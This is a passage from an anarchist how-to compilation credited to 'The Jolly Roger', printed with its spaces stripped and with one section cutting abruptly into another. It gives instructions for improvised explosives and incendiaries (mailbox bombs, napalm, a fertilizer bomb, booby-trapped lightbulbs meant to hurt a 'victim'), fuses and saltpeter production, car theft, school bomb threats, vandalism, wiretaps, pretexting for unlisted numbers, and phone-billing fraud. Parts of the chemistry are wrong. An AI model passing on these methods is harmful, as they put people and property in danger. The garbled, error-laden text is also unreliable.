Slideitintotheoutsidewindowandkeeppullingitbackupuntilyoucatchthe lockcablewhichshouldunlockthedoor.ThisdeviceisalsocalledaSLIMJIM. Nowgetthestereo,equalizer,radardetector,etc.Nowdestroytheinside.(A sharpknifedoeswondersontheseats!) 15.Doyouhateschool?byTheJollyRoger ? Oneofmyfavoritesforgettingoutofaclassortwoistocallinabomb threat.Tell'emthatitisinalocker.Thentheyhavetocheckthemall, whilstyoucanslipawayforanhourortwo.Youcanevenplaceafakebomb(in anylockerbutYOURS!).Theymightcancelschoolforaweekwhilethey investigate(ofcourse,youwillprobablyhavetomakeitupinthesummer). ? Getsomepurepotassiumorpuresodium,putitinacapsule,andflushit downthetoilet(smellsawful!Stinksupthewholeschool!). ? Useasmokegrenadeinthehallway.

? Stealthecomputerpasswords&keys.Orstealthe80columncardsinside iftheyare(gag)IBM. ? Makefriendswithstudentassistantsandhavethemchangeyourgradeswhen theteachershandintheirbubblesheetsforthereportcards. ? Spityourgumoutonthecarpetinthelibraryorwhateverandgrindit intothecarpet.Watchthejanitorscry! ? Drawonlockersorspraypaintonthebuildingthattheprincipalisa fascist. ? ? Stickapotatointhetailpipeoftheprincipal'scar. USEYOURIMAGINATION!

16.PhonerelatedvandalismbytheJollyRoger Ifyoulivewherethereareundergroundlinesthenyouwillbeabletoruin someone'sphonelifeveryeasily.Allyoumustdoisgototheirhouseandfind thegreenjunctionboxthatinterfacestheirline(andpossiblysomeothersin theneighborhood)withthemajorlines.Thesecanbefoundjustaboutanywhere buttheyareusuallyunderneaththenearestphonepole.Takeasocketwrenchand loosenthenutontheright.Thenjusttakeclippersorasledgehammerora bombanddestroytheinsidesandpulluptheirphonecable.Nowcutitinto segmentssoitcan'tbefixedbutmustbereplaced(Thereisaweek'sworthof workfor'em!!) 17.HighwayradarjammingbyTheJollyRoger Mostdriverswantingtomakebettertimeontheopenroadwillinvestinoneof thoseexpensiveradardetectors.However,thisdevicewillnotworkagainsta guntyperadarunitinwhichtheradarsignalisnotpresentuntilthecophas yourcarinhissightsandpullsthetrigger.ThenitisTOOLATEforyouto slowdown.Abettermethodistocontinuouslyjamanysignalwitharadarsignal ofyourown.Ihavetestedthisideawiththecooperationofalocalcopand foundthathisunitreadsrandomnumberswhenmycarapproachedhim.Itis suprisinglyeasytomakealowpowerradartransmitter.Aniftylittle semiconductorcalledaGunnDiodewillgeneratemicrowaveswhensuppliedwith the5to10voltDCandenclosedinthecorrectsizecavity(resonator).An8to 3terminalregulatorcanbeusedtogetthisvoltagefromacar's12vsystem. However,thecorrectconstructionandtuningofthecavityisdifficultwithout goodmicrowavemeasurementequipment.PoliceradarscommonlyoperateontheK bandat22GHz.OrmoreoftenontheXbandat10?25GHz.mostmicrowave intruderalarmsandmotiondetectors(mountedoverautomaticdoorsin supermarkets&banks,etc.)containaGunntypetransmitter/receivercombination thattransmitsabout10kilowattsat10?25GHz.Theseunitsworkperfectlyas jammers.Ifyoucannotgetonelocally,writetoMicrowaveAssociatesin Burlington,Massachusettsandaskthemforinfoon'Gunnplexers'forhamradio use.Whenyougettheunititmaybemountedinaplasticboxonthedashorin aweatherproofenclosurebehindthePLASTICgrille.Switchonthepowerwhenon anopenhighway.Theunitwillnotjamradartothesideorbehindthecarso don'tgospeedingpasttheradartrap.Aninterestingphenomenayouwillnotice isthatthedriverswhoareinfrontofyouwhoareusingdetectorswillhit theirbrakesasyouapproachlargemetalsignsandbridges.Yoursignalis bouncingoffoftheseobjectsandtriggeringtheirradardetectors! PSIfyouareinterestedinthissortofthing,getacopyofPOPULAR COMMUNICATIONS.Theadsintheretellyouwhereyoucangetallkindsofinfoon allkindsofneatequipmentforallkindsofneatthings! 18.SmokeBombsbytheJollyRoger Hereistherecipeforonehellofasmokebomb! 4partssugar 6partspotassiumnitrate(SaltPeter) HeatthismixtureoveraLOWflameuntilitmelts,stirringwell.Pouritintoa futurecontainerand,beforeitsolidifies,imbedafewmatchesintothemixture touseasfuses.Onepoundofthisstuffwillfillupawholeblockwiththick, whitesmoke!

19.MailBoxBombsbytheJollyRoger 1. 2. 3. Twoliterbottleofchlorine(mustcontainsodiumhypochlorate) Smallamountofsugar Smallamountofwater

Mixallthreeoftheseinequalamountstofillabout1/10ofthebottle.Screw onthelidandplaceinamailbox.It'shardtobelievethatsuchasmall explosionwillliterallyripthemailboxinhalfandsendit20feetintothe air!Becarefuldoingthis,though,becauseifyouarecaught,itisnotupto thepersonwhosemailboxyoublewuptopresscharges.Itisuptothecity. 20.TheeasiestwaytohotwirecarsbytheJollyRoger Getinthecar.Lookunderthedash.Ifit'senclosed,forgetitunlessyouwant tocutthroughit.Ifyoudo,doitneartheignition.Onceyougetbehindor neartheignitionlookfortworedwires.Inoldercarsredwasthestandard color,ifnot,lookfortwomatchedpairs.Whenyoufindthem,crossthemand takeoff! 21.HowtomakeNapalmbytheJollyRoger ? Poursomegasintoanoldbowl,orsomekindofcontainer. ? Getsomestyrofoamandputitinthegas,untilthegaswon'teatanymore. Youshouldhaveastickysyrup. ? Putitontheendofsomething(don'ttouchit!!).Theunusedstufflasts alongtime! 22.HowtomakeafertilizerbombbyTheJollyRoger Ingredients: ? ? ? ? Newspaper Fertilizer(thechemicalkind,GREENTHUMBorORCHO) Cotton Dieselfuel

Makeapouchoutofthenewspaperandputsomefertilizerinit.Thenputcotton ontop.Soakthecottonwithfuel.Thenlightandrunlikeyouhaveneverran before!Thisblowsup500squarefeetsodon'tdoitinanalley!! 23.TennisBallBombsbyTheJollyRoger Ingredients: ? ? ? ? Strikeanywherematches Atennisball Anicesharpknife Ducttape

Breakatonofmatchheadsoff.ThencutaSMALLholeinthetennisball.Stuff allofthematchheadsintotheball,untilyoucan'tfitanymorein.Thentape overitwithducttape.Makesureitisrealniceandtight!Then,whenyousee ageekwalkingdownthestreet,giveitagoodthrow.Hewillhaveablast!! 24.DisketteBombsbyTheJollyRoger

Youneed: ? ? ? ? Adisk Scissors Whiteorbluekitchenmatches(theyMUSTbethesecolors!) Clearnailpolish

1. Carefullyopenupthediskette(3?"disksarebestforthis!) 2. Removethecottoncoveringfromtheinside. 3. Scrapealotofmatchpowderintoabowl(useawoodenscraper,metal mightsparkthematchpowder!) 4. Afteryouhavealot,spreaditevenlyonthedisk. 5. Usingthenailpolish,spreaditoverthematchmixture 6. Letitdry 7. Carefullyputthediskettebacktogetherandusethenailpolishtoseal itshutontheinside(whereitcameapart). Whenthatdiskisinadrive,thedriveheadattemptstoreadthedisk,which causesasmallfire(ENOUGHHEATTOMELTTHEDISKDRIVEANDFUCKTHEHEADUP!!). LetthefuckheadtryandfixTHAT!!! 25.UnlistedPhoneNumbersbyTheJollyRoger Thereareacoupleofdifferentwaysofdoingthis.Let'sseeifthisonewill help:Everycityhasoneormoreofficesdedicatedtoassigningnumberstothe telephonewirepairs.TheseofficesarecalledDPACofficesandareavailableto servicerepswhoareinstallingorrepairingphones.TogettheDPACnumber,a servicerepwouldcallthecustomerservicenumberforbillinginformationin thetownthatthenumberislocatedinthatheistryingtogettheunlisted numberof.(Gotthat?)Theconversationwouldgosomethinglikethis:"Hi, Amarillo,thisisJoefromAnytownbusinessoffice,IneedtheDPACnumberfor thesouthsideoftown."Thisinfoisusuallypassedoutwithnoproblems,so... ifthefirstpersonyoucalldoesn'thaveit,tryanother.REMEMBER,noonehas ANYIDEAwhothehellyouarewhenyouaretalkingonthephone,soyoucanbe anyoneyoudamnwellplease!WhenyoucalltheDPACnumber,justtellthemthat youneedalistingforeithertheaddressthatyouhave,orthename.DPACDOES NOTSHOWWHETHERTHENUMBERISLISTEDORUNLISTED!!Also,ifyou'regoingto makeahabitofchasingnumbersdown,youmightwanttocheckintogettinga crisscrossdirectory,whichlistsphonenumbersbytheiraddresses.Itcostsa couplehundredbucks,butitiswellworthitifyouhavetochasemorethanone ortwonumbersdown! 26.FusesbyTheJollyRoger Youwouldbesurprisedhowmanyfilesareouttherethatusewhatfallsunder thecategoryofa"fuse."Theyassumethatyoujusthaveafewlyingaround,or knowwheretogetthem.Well,insomepartsofthecountry,fusesareextremely hardtocomeby...sothisfiletellsyouhowtomakeyourown.Bothfuses presentedherearefairlysimpletomake,andarefairlyreliable. SLOWBURNINGFUSE2inchesperminute Materialsneeded: ? ? ? Cottonstringor3shoelaces PotassiumNitrateorPotassiumChlorate Granulatedsugar

Procedure:

1. WashthecottonstringorshoelacesinHOTsoapywater,thenrinsewith freshwater 2. ? ? ? 3. 4. 5. Mixthefollowingtogetherinaglassbowl: 1partpotassiumnitrateorpotassiumchlorate 1partgranulatedsugar 2partshotwater Soakstringsorshoelacesinthissolution Twist/braid3strandstogetherandallowthemtodry Checktheburnratetoseehowlongitactuallytakes!!

FASTBURNINGFUSE40inchesperminute Materialsneeded: ? ? ? Softcottonstring Fineblackpowder(emptyafewshotgunshells!) Shallowdishorpan

Procedure: 1. 2. 3. 4. Moistenpowdertoformapaste. Twist/braid3strandsofcottontogether. Rubpasteintostringandallowtodry. Checktheburnrate!!!

27.HowtomakePotassiumNitratebyTheJollyRoger PotassiumNitrateisaningredientinmakingfuses,amongotherthings.Hereis howyoumakeit: Materialsneeded: ? 3?gallonsofnitratebearingearthorothermaterial ? ?cupofwoodashes ? Bucketorothersimilarcontainerabout45gallonsinvolume ? 2piecesoffinelywovencloth,eachabitbiggerthanthebottomofthe bucket ? Shallowdishorpanatleastaslargeindiameterasthebucket ? Shallow,heatresistantcontainer ? 2gallonsofwater ? Somethingtopunchholesinthebottomofthebucket ? 1gallonofanytypeofalcohol ? Aheatsource ? Paper&tape Procedure: 1. Punchholesontheinsidebottomofthebucket,sothatthemetalis "puckered"outwardfromthebottom. 2. Spreadclothovertheholesfromthebottom.

3. Placewoodashesonthecloth.Spreaditoutsothatitcoverstheentire clothandhasaboutthesamethickness. 4. 5. Place2ndclothontopofthewoodashes. Placethedirtorothermaterialinthebucket.

6. Placethebucketovertheshallowcontainer.NOTE:Itmayneedsupporton thebottomsothattheholesonthebottomarenotblocked. 7. Boilwaterandpouritovertheearthveryslowly.DoNOTpouritallat once,asthiswillclogthefilteronthebottom. 8. 9. 10. Allowwatertorunthroughholesintotheshallowdishonthebottom. BesurethatthewatergoesthroughALLoftheearth! Allowwaterindishtocoolforanhourorso.

11. Carefullydraintheliquidinthedishaway,anddiscardthesludgeinthe bottom. 12. Boilthisliquidoverafireforatleasttwohours.Smallgrainsofsalt willformscooptheseoutwiththepaperastheyform. 13. Whentheliquidhasboileddownto?itsoriginalvolumeletitsit.

14. After?hour,addequalvolumeofthealcohol;whenthismixtureispoured throughpaper,smallwhitecrystalsappear.Thisisthepotassiumnitrate. Purification: 1. 2. 3. 4. Redissolvecrystalsinsmallamountofboilingwater. Removeanycrystalsthatappear. Pourthroughimprovisedfilterthenheatconcentratedsolutiontodryness. Spreadoutcrystalsandallowtodry.

28.ExplodingLightbulbsbyTheJollyRoger Materialsneeded: ? ? ? ? ? ? ? ? Lightbulb(100w) Socket(duh...) ?cupsoapchips Blackpowder!(opensomeshotgunshells!) ?cupkeroseneorgasoline Adhesivetape Lighterorsmallblowtorch Glue

Procedureforasimpleexplodinglightbulb: 1. Drillasmallholeinthetopofthebulbnearthethreads!

2. Carefullypourtheblackpowderintothehole.Useenoughsothatit touchesthefilament! 3. Insertintosocketasnormal(makesurethelightisofforelseYOUwill

bethevictim!!) 4. Getthehellout!!

ProcedureforaNapalmBulb: 1. 2. 3. Heatkerosene/gasolineinadoubleboiler. Meltsoapchips,stirringslowly. Putsomewhereandallowtocool.

4. HeatthethreadsofthebulbVERYcarefullytomelttheglue.Remove threads,slowlydrawingoutthefilament.DoNOTbreakthecheapelectrical ignitersand/orthefilamentorthiswon'twork!! 5. Pourtheliquidintothebulb,andslowlylowerthefilamentbackdown intothebulb.Makesurethefilamentisdippedintothefluid. 6. Regluethethreadsbackon.Insertitintoasocketfrequentlyusedby thevictimandgetthehellout!! Whenthevictimflipstheswitch,hewillbeinforaBIGsurprise! 29.UnderwaterignitersbyTheJollyRoger Materialsneeded: ? Packof10silicondiodes.(AvailableatRadioShack.Youwillknowyou gottherightonesiftheyarevery,verysmallglassobjects!) ? Packofmatches ? 1candle Procedure: 1. Lightthecandleandallowapoolofmoltenwaxtoforminthetop.

2. Takeasinglematchandholdtheglasspartofasinglediodeagainstthe head.Bendthediodepinsaroundthematchheadsothatonewrapsinanupward directionandthensticksouttotheside.Dothesamewiththeotherwire,but inadownwarddirection.Thediodesshouldnowbehuggingthematchhead,butits wiresMUSTNOTTOUCHEACHOTHER! 3. Dipthematchheadinwaxtogiveitawaterproofcoat.Thesework underwater 4. Repeattomakeasmanyasyouwant.

Howtousethem: Whentheselittledudesarehookedacrossa6vbattery,thediodereacheswhat iscalledbreakdownvoltage.Whenmostelectricalcomponentsreachthisvoltage, theyusuallyproducegreatamountsofheatandlight,whilequicklymeltinginto alittleblob.Thisheatisenoughtoigniteamatchhead.Thesearerecommended foruseunderwater,wheremostotherignitersrefusetowork. 30.HomebrewblastcannonbyTheJollyRoger Materialsneeded:

? ? ? ? ? ? ? ? ? ?

1plasticdrainpipe,3feetlong,atleast3?inchesindiameter. 1smallerplasticpipe,about6incheslong,2inchesindiameter. 1largelighter,withfluidrefills(thisgobblesitup!) 1pipecaptofitthelargepipe,1pipecaptofitthesmallpipe. 5feetofbellwire. 1SPSTrockerswitch. 16vpolaroidpotapulsebattery. 15vrelay(getthisatRadioShack). ElectricalTape. Onefreeafternoon.

Procedure: ? Cutthebellwireintothreeequalpieces,andstriptheends.

? Cutaholeinthesideofthelargepipe,thesamediameterasthesmall pipe.Threadtheholeandoneendofthesmallpipe.Theyshouldscrewtogether easily. ? Takeapieceofscrapmetal,andbenditintoan"L"shape,thenattachit tothelevelonthelighter: /gasswitchishere V / !lighter!!<metallever!! ? Now,everytimeyoupullthe'trigger'gasshouldflowfreelyfromthe lighter.Youmayneedtoenlargethe'gasport'onyourlighter,ifyouwishto beabletofiremorerapidly. ? Connecttwowirestothetwopostsontheswitch.

? Cuttwoholesinthesideofthesmallertube,onefortheswitchonthe bottom,andoneforthemetalpieceonthetop.Then,mounttheswitchinthe bottom,runningthewiresupandoutofthetop. ? Mountthelighter/triggerinthetop.Nowtheswitchshouldrockeasily, andthetriggershouldcausethelightertopouroutgas.Rescrewthesmaller tubeintothelargerone,holddownthetriggerabit,letitgo,andthrowa matchinthere.Ifallgoeswell,youshouldhearanicebig'THUD!' ? Getaholdoftherelay,andtakeoffthetop.

1 v/ 2/<thecenterobjectisthemetalfingerinsidetherelay 3 cc/ oo4 ii ll5 ? Connect(1)tooneofthewirescomingfromtheswitch.Connect(2)to (4),andconnect(5)toonesideofthebattery.Connecttheremainingwirefrom theswitchtotheothersideofthebattery.Nowyoushouldbeabletogetthe relaytomakealittle'buzzing'soundwhenyoufliptheswitchandyoushould seesometinylittlesparks. ? Now,carefullymounttherelayontheinsideofthelargepipe,towards theback.Screwonthesmallerpipe,tapethebatterytothesideofthecannon barrel(yes,butlooksaren'teverything!)

? Youshouldnowbeabletoletalittlegasintothebarrelandsetitoff byflippingtheswitch. ? PutthecaponthebackendofthelargepipeVERYSECURELY.Youarenow readyforthefirsttrialrun! ToTest: Putsomethingvery,verylargeintothebarrel,justsothatitfits'just right'.Now,findastrongguy(therecoilwillprobablyknockyouonyourass ifyouaren'tcareful!).Putonashoulderpad,earmuffs,andpossiblysomeother protectiveclothing(trusttheJollyRoger!Youaregoingtoneedit!).Holdthe triggerdownfor30seconds,holdontight,andhittheswitch.Withluckand theproperadjustments,youshouldbeabletoputafrozenorangethrough?or plywoodat25feet. 31.ChemicalEquivalencylistbyTheJollyRoger Acacia................................................................GumArabic AceticAcid..............................................................Vinegar AluminumOxide............................................................Alumia AluminumPotassiumSulphate.................................................Alum AluminumSulfate............................................................Alum AmmoniumCarbonate.....................................................Hartshorn AmmoniumHydroxide.......................................................Ammonia AmmoniumNitrate......................................................SaltPeter AmmoniumOleate.....................................................AmmoniaSoap Amylacetate...........................................................BananaOil BariumSulfide.........................................................BlackAsh CarbonCarbinate...........................................................Chalk Carbontetrachloride...............................................CleaningFluid CalciumHypochloride............................................BleachingPowder CalciumOxide...............................................................Lime CalciumSulfate.................................................PlasterofParis CarbonicAcid............................................................Seltzer Cetyltrimethylammoniumbromide......................................AmmoniumSalt Ethylinedichloride...................................................DutchFluid FerricOxide...........................................................IronRust Furfuraldehyde..........................................................BranOil Glucose...............................................................CornSyrup Graphite.............................................................PencilLead HydrochloricAcid..................................................MuriaticAcid HydrogenPeroxide.......................................................Peroxide LeadAcetate.......................................................SugarofLead LeadTerooxide.........................................................RedLead MagnesiumSilicate..........................................................Talc MagnesiumSulfate.....................................................EpsomSalt Methylsalicylate................................................WinterGreenOil Naphthalene............................................................Mothballs Phenol.............................................................CarbolicAcid PotassiumBicarbonate............................................CreamofTarter PotassiumChromiumSulfate............................................Chromealum PotassiumNitrate.....................................................SaltPeter SodiumOxide................................................................Sand SodiumBicarbonate...................................................BakingSoda SodiumBorate..............................................................Borax SodiumCarbonate....................................................WashingSoda SodiumChloride.............................................................Salt SodiumHydroxide.............................................................Lye SodiumSilicate............................................................Glass

SodiumSulfate....................................................Glauber'sSalt SodiumThiosulfate...........................................Photographer'sHypo SulfuricAcid.......................................................BatteryAcid Sucrose...............................................................CaneSugar ZincChloride.....................................................Tinner'sFluid ZincSulfate.......................................................WhiteVitriol 32.PhoneTapsbyTheJollyRoger Hereissomeinfoonphonetaps.Inthisfileisaschematicforasimple wiretap&instructionsforhookingupasmalltaperecordercontrolrelaytothe phoneline. First,Iwilldiscusstapsalittle.Therearemanydifferenttypesoftaps. Therearetransmitters,wiredtaps,andinductiontapstonameafew.Wiredand wirelesstransmittersmustbephysicallyconnectedtothelinebeforetheywill doanygood.Onceawirelesstapisconnectedtotheline,itcantransmitall conversationsoveralimitedreceptionrange.Thephonesinthehousecaneven bemodifiestopickupconversationsintheroomandtransmitthemtoo!These tapsareusuallypoweredoffofthephoneline,butcanhaveanexternalpower source.Youcangetmoreinformationonthesetapsbygettinganissueof PopularCommunicationsandreadingthroughtheads.Wiredtaps,ontheother hand,neednopowersource,butawiremustberunfromthelinetothelistener ortoatransmitter.Thereareobviousadvantagesofwirelesstapsoverwired ones.Thereisonetypeofwirelesstapthatlookslikeanormaltelephonemike. Allyouhavetodoisreplacetheoriginalmikewiththisanditwilltransmit allconversations!Thereisalsoanexotictypeofwiredtapknownasthe 'InfinityTransmitter'or'HarmonicaBug'.Inordertohookoneofthese,it mustbeinstalledinsidethephone.Whensomeonecallsthetappedphone& *before*itringsandblowsawhistleovertheline,thetransmitterpicksup thephoneviaarelay.Themikeonthephoneisactivatedsothatthecallercan hearalloftheconversationsintheroom.Thereisasweeptonetestat 415/BUG1111whichcanbeusedtodetectoneofthesetaps.Ifoneoftheseis onyourline&thetest#sendsthecorrecttone,youwillhearaclick. Inductiontapshaveonebigadvantageovertapsthatmustbephysicallywiredto thephone.Theydonothavetobetouchingthephoneinordertopickupthe conversation.Theyworkonthesameprincipleasthelittlesuctioncuptape recordermikesthatyoucangetatRadioShack.Inductionmikescanbehookedup toatransmitterorbewired. Hereisanexampleofindustrialespionageusingthephone: Asalesmanwalksintoanoffice&makesaphonecall.Hefakestheconversation, butwhenhehangsupheslipssomefoamrubbercubesintothecradle.Thecalled partycanstillhearallconversationsintheroom.Whensomeonepicksupthe phone,thecubesfallawayunnoticed. Atapcanalsobeusedonaphonetooverhearwhatyourmodemisdoingwhenyou arewardialing,hacking,orjustplaincallingabbs. Hereistheschematic: )!)!(> )!( Cap^)!( )!( )!( )!( ^^^^^)!(> ^100K ! !Youhavenow'seized'atrunk.Afterthis,switchtomultifrequency

anddial: KP0700456x00xST ? KP=KPtoneonBlueBox ? x=variablebetween1and3 ? ST=STtoneonBlueBox TheequipmentnowthinksthattheoperatorhasdialedAlliancefromher switchboardandtheconferenceshallbebilledthere.SinceBlueBoxingissuch alargetopic,thisisasfarasIwillgointoit'suses. Billingtoaloop: Athirdmethodofreceivingafreeconferenceisbybillingouttoaloop.A loopis2numbersthatwhentwopeoplecall,theycantalktoeachother.You're sayingwoopteedoright?Wrong!Loopscanbeusefultophreaks.First,dial alliancedirect.Aftergoingthroughthebeginningprocedure,whichwillbe discussedlaterinthistutorial,dial0andwaitforanAllianceoperator.When sheanswerstellheryouwouldliketobilltheconferencetosuchandsucha number.(Aloopwhereyourphriendisontheotherside)Shewillthencallthat numbertoreceivevoiceverification.Ofcourseyourphriendwillbewaitingand willacceptthecharges.Thus,theconferenceisbilledtotheloop. Billingtocallforwarding: Whenyoudialanumberthatiscallforwarded,itisfirstansweredbythe originallocation,thenforwarded.Theoriginallocationwillhangupif2600hz isreceivedfromonlyoneendoftheline.Therefore,ifyouweretowaitafter theforwardedresidenceanswered,youwouldreceivetheoriginallocation'sdial tone. Example: Dial8003254067 Theoriginalresidencewouldanswer,thenforwardthecall,asecondtypeof ringingwouldbeheard.Whenthissecondresidenceanswerssimplywaituntil theyhangup.Afterabouttwentysecondsyouwillthenreceivetheoriginal residence'sdialtonesinceitheard2600hzfromoneendoftheline.Simply dialAlliancefromthispointandtheconferencewillbebilledtotheoriginal residence.Thesearethefourmainwaystoreceiveafreeconference.Iamsure manymoreexist,butthesefourarequitehandythemselves. LogonProcedure: OnceAllianceanswersyouwillhearatwotonecombination.Thisistheirwayof saying'Howmanypeopledoyouwantontheconferencedude?'Simplytypeina2 digitcombination,dependingonwhatbridgeofAllianceyouareon,between10 and59.Afterthiseitherhit'*'tocanceltheconferencesizeandinput anotherorhit'#'tocontinue.YouarenowinAllianceTeleconferencingandare onlysecondsawayfromhavingyourownroaringconferencegoingstrong!!! DialinginConferees: Todialyourfirstconferee,dial1+npa+pre+suffandawaithis/heranswer. npa=areacode pre=prefix suff=suffix Ifthenumberisbusy,orifnooneanswerssimplyhit'*'andyourcallwillbe aborted.But,iftheydoanswer,hitthe'#'key.Thiswilladdthemtothe conference.Nowcommencedialingotherconferees. JoiningYourConference: Tojoinyourconferencefromcontrolmodesimplyhitthe'#'key.Withina secondortwoyouwillbechattingwithallyourbuddies.Togobackinto

controlmode,simplyhitthe'#'keyagain. TransferringControl: Totransfercontroltoanotherconferee,gointocontrolmode,hitthe# 6+1+npa+pre+suffoftheconfereeyouwishtogivecontrolto.Ifafter,youwish toabortthistransferhitthe'*'key. NOTE:Transferofcontrolisoftennotavailable.Whenyoureceiveamessage statingthis,yousimplycannottransfercontrol. MutedConferences: Torequestamutedconferencesimplyhitthe9key.Iamnotexactlysurewhata mutedconferenceisbutitisprobablyawaytokeepunwantedeavesdroppersfrom listeningin. DialingAllianceOperators: Simplydial0asyouwouldfromanyfoneandwaitfortheoperatortoanswer. EndingYourConference: Toendyourconferencealltogether,thatiskickeveryoneincludingyourself off,gointocontrolmodeandhit'*'...afterafewsecondssimplyhangup.Your conferenceisover. AreAllianceOperatorsDangerous? No.Notintheleast.Theworsttheycandotoyouwhileyouarehavinga conferenceisdropallconfereesincludingyourself.Thisisinnowayharmful, justalittleaggravating. AllianceandTracing: Alliancecantrace,asallcitizensoftheUnitedStatescan.Butthishasto allbepremeditatedandAT&Thastobecalledandit'sreallyalargehassle, therefore,itisalmostneverdone.Alliancesimplydoesnotwantitknownthat teenagersarephuckingthemover.TheonlysortofsafetyequipmentAlliancehas onlineisasimplepenregister.Thislittledevicesimplyrecordsallthe numbersoftheconfereesdialed.Nobigdeal.AllAlliancecandoiscallup thatpersonsnumber,threatenandquestion.However,legally,theycando nothingbecauseallyoudidwasansweryourfone. NOTE:AlmostallinstructionsaretoldtothepersonincommandbyAlliance recordings.Alotofthistutorialisjustalistingofthosecommandsplus informationgatheredbyeithermyselforthephellowphreaksoftheworld!!! 38.AquaBoxPlansbyTheJollyRoger EverytruephreakerlivesinfearofthedreadedFBI'LockInTrace'.Foralong time,itwasimpossibletoescapefromtheLockInTrace.Thisboxdoesofferan escaperoutewithsimpledirectionstoit.Thisboxisquiteasimpleconcept, andalmostanyphreakerwithbasicelectronicsknowledgecanconstructanduse it. TheLockInTrace AlockintraceisadeviceusedbytheFBItolockintothephoneusers locationsothathecannothangupwhileatraceisinprogress.Forthoseof youwhoarenotfamiliarwiththeconceptof'lockingin',thenhere'sabrief description.TheFBIcantapintoaconversation,sortoflikeathreewaycall connection.Then,whentheygetthere,theycanplugelectricityintothephone line.Allphoneconnectionsareheldopenbyacertainvoltageofelectricity. Thatiswhyyousometimesgetstaticandfaintconnectionswhenyouarecalling faraway,becausetheelectricityhastroublekeepingthelineup.Whatthelock intracedoesiscutintothelineandgeneratethatsamevoltagestraightinto thelines.Thatway,whenyoutryandhangup,voltageisretained.Yourphone

willringjustlikesomeonewascallingyouevenafteryouhangup.(Ifyouhave callwaiting,youshouldunderstandbetteraboutthat,forcallwaiting interceptstheelectricityandmakesatonethatmeanssomeoneisgoingthrough yourline.Then,itisamatterofwhichvoltageishigher.Whenyoupushdown thereceiver,thenitseesawstheelectricitytotheotherside.Whenyouhave apersononeachlineitisimpossibletohangupunlessoneorbothofthem willhangup.Ifyoutrytohangup,voltageisretained,andyourphonewill ring.Thatshouldgiveyouanunderstandingofhowcallingworks.Also,when electricitypassesthroughacertainpointonyourphone,theelectricitycauses abelltoring,oronsomenewerphonesanelectronicringtosound.)So,in ordertoeliminatethetrace,yousomehowmustlowerthevoltagelevelonyour phoneline.Youshouldknowthateverytimesomeoneelsepicksupthephone line,thenthevoltagedoesdecreasealittle.Inthefirststepsofplanning thisout,Xeroxsuggestedgettingaboutahundredphonesallhookedintothe samelinethatcouldallbetakenoffthehookatthesametime.Thatwould greatlydecreasethevoltagelevel.Thatisalsowhymostthreewayconnections thatareusingthebellservicethreewaycalling(whichisonly$3amonth) becomequitefaintafterawhile.Bynow,youshouldunderstandthebasicidea. Youhavetodrainallofthepoweroutofthelinesothevoltagecannotbe keptup.RathersuddendrainingofpowercouldquicklyshortouttheFBIvoltage machine,becauseitwasonlybuilttosustaintheexactvoltagenecessaryto keepthevoltageout.Fornow,imaginethis.OneofthenormalRadioShack generatorsthatyoucangopickupthatoneendofthecordthathooksintothe centralboxhasaphonejackonitandtheotherhasanelectricalplug.This way,youcan"flash"voltagethroughtheline,butcannotdrainit.So,some modificationshavetobedone. Materials ABEOC(BasicElectricalOutputSocket),likeasmalllamptypeconnection, whereyoujusthaveasimpleplugandwirethatwouldplugintoalightbulb. Oneofcordsmentionedabove,ifyoucan'tfindonethenconstructyourown... Samevoltageconnection,buttherestrainermustbebuiltin(I.E.Thecentral box)Twophonejacks(oneforthemodem,oneforifyouarebeingtracedtoplug theaquaboxinto)Somecreativityandeasywork. Notice:Nophoneshavetobedestroyed/modifiedtomakethisbox,sodon'tgo outandbuyanewphoneforit! Procedure Allright,thisisaverysimpleprocedure.IfyouhavetheBEOC,itcoulddrain intoanything:aradio,orwhatever.Thepurposeofhavingthatisyouaregoing tosuckthevoltageoutfromthephonelineintotheelectricalapplianceso therewouldbenovoltagelefttolockyouinwith. 1. Taketheconnectioncord.Examinetheplugattheend.Itshouldhaveonly twoprongs.Ifithasthree,still,donotfear.Makesuretheelectrical applianceisturnedoffunlessyouwanttobecomeacrispycritterwhilemaking thisthing.Mostplugswillhaveahardplasticdesignonthetopofthemto preventyoufromgettinginattheelectricalwiresinside.Well,removeit.If youwanttokeeptheplug(Idon'tseewhy...)thenjustcutthetopoff.When youlookinside,LowandBehold,youwillseethatatthebaseoftheprongs thereareafewwiresconnectingin.Thosewiresconductthepowerintothe appliance.So,youcarefullyunwrapthosefromthesidesandpullthemoutuntil theyareaboutaninchaheadoftheprongs.Ifyoudon'twanttokeepthejack, thenjustriptheprongsout.Ifyouare,covertheprongswithinsulationtape sotheywillnotconnectwiththewireswhenthepowerisbeingdrainedfromthe line. 2. Dothesamethingwiththeprongsontheotherplug,soyouhavethewires evenlyconnected.Now,wraptheendofthewiresaroundeachother.Ifyou happentohavetheotherendofthevoltagecordhookedintothephone,stop readingnow,you'retoofuckingstupidtocontinue.Afteryou'vewrappedthe

wiresaroundeachother,thencoverthewholethingwiththeplugswith insulatingtape.Then,ifyoubuiltyourowncontrolboxorifyouboughtone, thencramallthewiresintoitandrecloseit.Thatboxisyourticketoutof this. 3. Recheckeverythingtomakesureit'sallinplace.Thisisapretty flimsyconnection,butonlatermodelswhenyougetmoreexperiencedatitthen youcansolderawayatitandformthewholedeviceintoonebigbox,withsome kindofcheapMattelhandheldgameinsidetobethepowerconnector.Inorder touseit,justkeepthisboxhandy.Plugitintothejackifyouwant,butit willslightlylowerthevoltagesoitisn'tconnected.Whenyouplugitin,if youseesparks,unplugitandrestartthewholething.Butifitjustseemsfine thenleaveit. Use Now,soyouhavethewholethingpluggedinandall...Donotusethisunless thesituationisdesperate!Whenthetracehasgoneon,don'tpanic,unplugyour phone,andturnontheappliancethatitwashookedto.Itwillneedenergyto turnitselfon,andhere'sagreatsource...Thevoltagetokeepaphoneline openisprettysmallandasimplelightbulbshoulddrainitallinandprobably shorttheFBIcomputeratthesametime. 39.HindenbergBombbyTheJollyRoger Needed: ? ? ? ? ? 1Balloon 1Bottle 1LiquidPlumber 1PieceAluminumfoil 1LengthFuse

